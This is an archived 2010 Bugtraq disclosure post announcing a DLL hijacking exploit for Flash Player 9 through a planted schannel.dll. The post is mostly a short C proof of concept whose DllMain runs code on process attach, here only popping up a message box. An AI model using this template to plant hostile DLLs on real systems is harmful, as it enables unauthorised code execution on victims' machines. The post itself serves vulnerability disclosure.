| New User, Welcome! Login |
Flash Player 9 DLL Hijacking Exploit (schannel.dll)
| From: |
info securitylab ir |
| To: |
bugtraq securityfocus com |
| Cc: |
|
| Subject: |
Flash Player 9 DLL Hijacking Exploit (schannel.dll) |
| Date: |
Fri - Aug 27, 2010 02:19 AM |
=======================================================
Flash player 9.exe DLL Hijacking Exploit (schannel.dll)
=======================================================
Founded By: Securitylab.ir (Kamran Safaei Tabrizi)
=======================================================
include "stdafx.h"
void init() {
MessageBox(NULL,"Ops", "OpS!",0x00000003);
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
=============================================
|
|
|
Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!